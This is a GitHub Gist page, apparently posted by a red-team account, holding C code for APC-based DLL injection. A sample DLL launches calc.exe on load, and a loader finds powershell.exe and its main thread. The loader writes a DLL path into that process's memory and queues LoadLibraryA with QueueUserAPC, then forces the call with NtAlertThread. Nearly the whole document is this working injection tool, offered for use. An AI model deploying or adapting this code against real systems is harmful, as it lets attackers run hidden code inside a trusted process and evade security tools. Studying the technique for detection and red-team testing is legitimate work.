Created
July 11, 2022 22:08
-
-
Save RedTeams/42a3543a5a962684db28e90bd8fae441 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //sample dll | |
| #define WIN32_LEAN_AND_MEAN | |
| #include <windows.h> | |
| BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpData) | |
| { | |
| switch(dwReason) | |
| { | |
| case DLL_PROCESS_ATTACH: | |
| WinExec("C:\\Windows\\System32\\calc.exe", 0); // lol | |
| break; | |
| case DLL_PROCESS_DETACH: | |
| case DLL_THREAD_ATTACH: | |
| case DLL_THREAD_DETACH: | |
| break; | |
| } | |
| return TRUE; | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // wrote this in a bit of a hurry lol, so scuse | |
| // the shitty formating | |
| // x86_64-w64-mingw32-gcc triggerable_alert.c -o alert.exe -lntdll | |
| // alert.exe C:\path\to\my\loadable.dll | |
| #define WIN32_LEAN_AND_MEAN | |
| #include <windows.h> | |
| #include <winternl.h> | |
| #include <tlhelp32.h> | |
| #include <ntstatus.h> | |
| #include <stdio.h> | |
| extern NTSTATUS NtAlertThread( | |
| HANDLE hThread | |
| ); | |
| extern NTSTATUS NtSuspendThread( | |
| HANDLE hThread, | |
| PULONG SuspendCount | |
| ); | |
| extern NTSTATUS NtResumeThread( | |
| HANDLE hThread, | |
| PULONG Suspendcount | |
| ); | |
| static DWORD locate_process(PCHAR ProcessName) | |
| { | |
| HANDLE hProcessSnap = NULL; | |
| hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); | |
| if ( hProcessSnap != NULL ) { | |
| PROCESSENTRY32 pentry; | |
| Process32First(hProcessSnap, &pentry); | |
| do { | |
| if ( Process32Next(hProcessSnap, &pentry) == FALSE ) | |
| { | |
| goto end; | |
| } | |
| } while ( strcmp(pentry.szExeFile, ProcessName) != 0 ); | |
| return pentry.th32ProcessID; | |
| } | |
| end: | |
| return 0; | |
| } | |
| static DWORD locate_threadmain(DWORD dwProcessId) | |
| { | |
| HANDLE hThreadSnapshot = NULL; | |
| hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); | |
| if ( hThreadSnapshot != NULL ) { | |
| THREADENTRY32 tentry; | |
| tentry.dwSize = sizeof(THREADENTRY32); | |
| Thread32First(hThreadSnapshot, &tentry); | |
| do { | |
| if ( Thread32Next(hThreadSnapshot, &tentry) == FALSE ) | |
| { | |
| goto end; | |
| } | |
| } while ( tentry.th32OwnerProcessID != dwProcessId ); | |
| return tentry.th32ThreadID; | |
| } | |
| end: | |
| return 0; | |
| } | |
| int main(int argc, char *argv[]) | |
| { | |
| DWORD dwPId = 0; | |
| dwPId = locate_process("powershell.exe"); | |
| if ( dwPId != 0 ) { | |
| printf("[*] Putting Process MAIN thread in alertable state %i\n", dwPId); | |
| DWORD hThreadId = locate_threadmain(dwPId); | |
| // /shrug | |
| HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, hThreadId); | |
| printf("[ ] tid %i\n", hThreadId); | |
| if ( hThread != NULL ) { | |
| LPVOID kern_32 = LoadLibraryA("kernel32.dll"); | |
| LPVOID libfcn = GetProcAddress((HANDLE)kern_32, "LoadLibraryA"); | |
| NtSuspendThread(hThread, NULL); | |
| HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, | |
| dwPId); | |
| HANDLE lolkillme = VirtualAllocEx(hProcess, NULL, strlen(argv[1]), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
| WriteProcessMemory(hProcess, lolkillme, argv[1], strlen(argv[1]), NULL); | |
| QueueUserAPC((PAPCFUNC)libfcn, hThread, (ULONG_PTR)lolkillme); | |
| // gg windows | |
| NtAlertThread(hThread); | |
| NtResumeThread(hThread, NULL); | |
| printf("[*] lovely\n"); | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment